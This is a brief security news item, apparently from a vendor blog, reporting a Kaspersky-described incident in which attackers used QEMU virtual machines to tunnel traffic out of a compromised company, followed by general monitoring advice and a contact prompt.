One unnamed company discovered that QEMU could be exploited as a means of data tunneling when it identified and analyzed suspicious network activity in its infrastructure. This fact was confirmed by researchers from Kaspersky, who demonstrated a security incident.
Instead of well-known tunneling tools such as Chisel, FRP, ligolo, ngrok, or Plink, which are more sensitive to monitoring tools, attackers chose QEMU. QEMU can emulate, among other things, socket interfaces and bypass conventional monitoring tools. Access to the compromised company was achieved through strategically positioned QEMU virtual machines, which pivoted and ultimately tunneled communication to the internet. It is important to note that encryption of communication was sacrificed for stealth, making the tunneled data appear as normal traffic. The created virtual machines had only 1 MB of allocated RAM, minimizing their footprint on servers and making them difficult to detect. Attackers accessed the corporate infrastructure through a cloud server running Kali Linux. However, this marks the first time that the QEMU virtualization platform has been utilized for such purposes. Detailed and continuous network monitoring, along with a vigilant SOC team, is crucial to prevent similar attacks. Suspicious installations of tools not used in the company’s infrastructure can also be monitored.
If you have concerns about your virtual security, please contact us.